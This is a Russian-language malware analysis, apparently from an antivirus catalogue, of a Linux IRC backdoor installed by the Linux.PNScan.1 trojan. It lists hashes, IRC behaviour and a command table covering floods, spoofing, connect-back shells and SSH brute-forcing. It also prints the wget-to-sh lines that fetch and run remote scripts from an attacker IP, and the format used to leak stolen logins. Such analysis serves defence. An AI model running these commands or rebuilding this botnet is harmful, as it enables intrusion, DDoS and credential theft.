SHA1:
- 3a99f7816c6864fd36ceea3380e591d337b0b241 (unpacked)
- 691704fb9de3e1d4a6c5b84b99be71ef375257a8 (packed)
Бэкдор для операционных систем семейства Linux, устанавливаемый троянцем Linux.PNScan.1. В качестве лок-файла используется "/var/run/.boss.pid".
Для соединения с управляющим IRC-сервером формирует строку имени и псевдонима следующим образом:
m64|dog|root|%c%c%c%c%c%c%c%c%c
где %c – случайный символ из набора цифр ("0123456789").
При успешном подключении к IRC-серверу отправляет команды:
NICK <nick>\n
USER x00 localhost localhost :dogscan\n
где <nick> - псевдоним, сформированный по указанному выше алгоритму.
При подключении к IRC-серверу вредоносная программа ожидает поступления входящих команд. Бэкдор способен выполнять следующий базовый набор команд:
Команда | Действие | Комментарий |
---|---|---|
352 | Установить поддельный IP | |
376 | Зайти на канал | Send(fd, "MODE %s -xi\n", nick); Send(fd, "MODE %s +B\n", nick); Send(fd, "JOIN %s :%s\n", chan, pass); |
433 | Сгенерировать новый ник | |
ERROR | Сгенерировать новый ник | |
422 | Зайти на канал | Send(fd, "MODE %s -xi\n", nick); Send(fd, "MODE %s +B\n", nick); Send(fd, "JOIN %s :%s\n", chan, pass); |
NICK | Поменять ник на строку из команды | |
PING | Отправить PONG | |
PRIVMSG | Выполнить специальную команду |
Помимо этого, троянец способен выполнять следующий набор расширенных команд:
Команда | Действие | Синтаксис |
---|---|---|
RANDOMFLOOD | Случайным образом переключиться между режимами ACK и SYN Flood | RANDOMFLOOD <target> <port> <secs> |
NSACKFLOOD | ACK Flood | NSACKFLOOD <target> <port> <secs> |
NSSYNFLOOD | SYN Flood | NSSYNFLOOD <target> <port> <secs> |
ACKFLOOD | ACK Flood (spoofed) | |
SYNFLOOD | SYN Flood (spoofed) | SYNFLOOD <target> <port> <secs> |
UDP | UDP Flood | UDP <target> <port> <secs> |
UNKNOWN | Начать DDoS-атаку | UNKNOWN <target> <secs> |
SERVER | Сменить сервер на указанный в команде | |
GETSPOOFS | Получить параметры спуфинга | |
SPOOFS | Установить IP или диапазон IP для спуфинга | SPOOFS <iprange/ip> |
GET | Выполнить загрузку указанного файла | GET <url> <save as> |
VERSION | Возвратить версию бэкдора | |
KILLALL | Прекратить DDoS-атаку | |
HELP | Показать список доступных команд | |
CBACK | Бэкконнект | CBACK <ip> <port> connectback shell |
SCANRND | Взлом SSH. Выбираются случайные IP из диапазона, используется стандартный словарь | SCANRND <192 or 192.168 or 192.168.0> <threads> <minutes> |
SCANRND2 | Взлом SSH. Выбираются случайные IP из диапазона, словарь указывается во входных параметрах | SCANRND2 <192 or 192.168 or 192.168.0> <threads> <minutes> <user> <passwd> |
SCANSUB | Взлом SSH. Перебираются все IP из диапазона, используется стандартный словарь | SCANSUB <192.168> <threads> |
SCANSUB2 | Взлом SSH. Перебираются все IP из диапазона, словарь указывается во входных параметрах | SCANSUB2 <192.168> <threads> <user> <passwd> |
DOGRND | Взлом SSH. Перебираются случайные IP из диапазона, используется стандартный словарь | DOGRND <192 or 192.168 or 192.168.0> <threads> <minutes> |
DOGSUB | Взлом SSH. Перебираются все IP из диапазона, используется стандартный словарь | DOGSUB <192.168> <threads> |
IRC | Отправка указанных команд IRC на сервер | IRC <arg1> <arg2> <arg...> |
SH | Выполнить набор sh-команд | SH <arg1> <arg2> <arg...> |
SCANRND, SCANRND2, SCANSUB, SCANSUB2 после успешного подбора пары login:password выполняют в удаленной системе команду:
wget -qO - http://104.199.135.124/bbsh | sh > /dev/null 2>↦1
или
wget -qO - http://104.199.135.124/wgsh | sh > /dev/null 2>↦1
Скачиваемые скрипты устанавливают в систему Linux.BackDoor.Tsunami.144.
DOGRND, DOGSUB после подбора пары login:password выполняют команду:
uname -a || echo -
После чего пользователю "##scaninfo##" в IRC-чате будет послана информация вида:
[g+] <login>@<ip> | <password> | <os> \n